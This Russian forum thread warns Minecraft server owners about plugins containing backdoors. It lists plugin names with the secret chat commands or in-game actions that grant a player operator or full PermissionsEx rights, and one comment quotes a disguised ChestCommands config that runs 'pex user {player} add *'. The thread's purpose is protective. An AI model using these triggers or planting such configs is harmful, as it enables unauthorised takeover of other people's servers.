Список плагинов с уязвимостями

Посетители, находящиеся в группе Гости, не могут оставлять комментарии.
Сергей

17 июня 2016 - 02:23

Описание:Некоторые плагины созданы специально для того, чтобы злоумышленник мог получить админку на сервере, на котором установлен плагин с уязвимостью. Способы получения админок очень разные и хитрые. Например: зайдя на сервер с таким плагином, злоумышленник может ударить три раза по траве каким-нибудь определённым блоком, а после этого прописать определённую команду и он автоматически становится или оператором, или получает самую главную группу в плагине PermissionsEX.Список: 1. aAntiSpam_v1.1 - способ взлома пока не известен. 2. Dupe - способ взлома пока не известен. 3. FloodProtect - Ударить по грязи три раза и прописать в чате команду /fp help 18971712 4. AntiBot - Берем рычаг в руки и нажимаем ПКМ. 5. Ural Paspport - Прописать в чате команду /passport 2 раза и нажать в инвентаре по нужным ячейкам. Скрин. 6. HypixelPets - Прописать в чате команду /nethernetwork2skingworld76 (не проверено). 7. ProtocolLibFix - Прописать команду /protocollibfix:autoworld (Не проверено). /CM проверить есть ли плагин, потом крафтим табличку и пишем CMBest в чате появится: " у вас * ник: Поздравляю". 8. RegisterFix - Появляется меню ChestCommands, кликнуть на определённый предмет в меню. 9. BukkitApiEnhancer - Написать в чат /xhomexx (Не проверено).

8 комментариев
alex

14 апреля 2017 - 19:58

Появился еще один плагин с уязвимостью RegisterFix

Сергей

14 апреля 2017 - 19:59

alex gamer сказал(а):
Появился еще один плагин с уязвимостью RegisterFix
Какой способ взлома? 

alex

14 апреля 2017 - 20:08

Сергей TU154 сказал(а):
Какой способ взлома? 
Способ взлома пока что не известен, мне ее скинули чтобы я ее установил за покупку доната. Я сделал вид что установил этот плагин, и потом мне написал этот человек что я не установил ее. После этого я ему написал на проверку что плагин с уязвимостью он начал грубить и добавил в ЧС. Могу скинуть этот плагин...

alex

14 апреля 2017 - 20:13

Сергей TU154 сказал(а):
Какой способ взлома? 
Нашел способ взлома!! Это переделанный ChestCommands только
menu-settings:   name: '&cВзлом опки.'   rows: 1   command:'register110011110' aa4:   COMMAND:'tell:&3Админка взломана!;console:pex user{player} add *'   NAME: '&eВзлом админки'   LORE: - ''   ID: '264'   POSITION-X: 5   POSITION-Y: 1

Сергей

14 апреля 2017 - 20:18

Добавил в список.

Nextler

23 августа 2017 - 15:06

Выход из всех ситуации настолько прост. Что нужно делать чтобы не было проблем с сервером: 1. Самим собирать сборку сервера 2. Устанавливать плагины он зарубежных авторов или от наших но только проверенных 3. Доверять свой сервер проверенным людям( то есть выдать администратора или оператора)4. Никому не давать доступ к своей сборке/консоли сервера. 5. 5 раз перечитать функционал плагина перед его установкой на сервер !!

Женя

14 марта 2018 - 20:32

Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!

Сергей

14 марта 2018 - 21:33

Женя Жека228 сказал(а): Спасибо, вам за этот список хак плагинов теперь я хоть не много обезопасил свой сервер от взлома опки!
Это ещё не весь список, есть и другие, так что будьте осторожнее.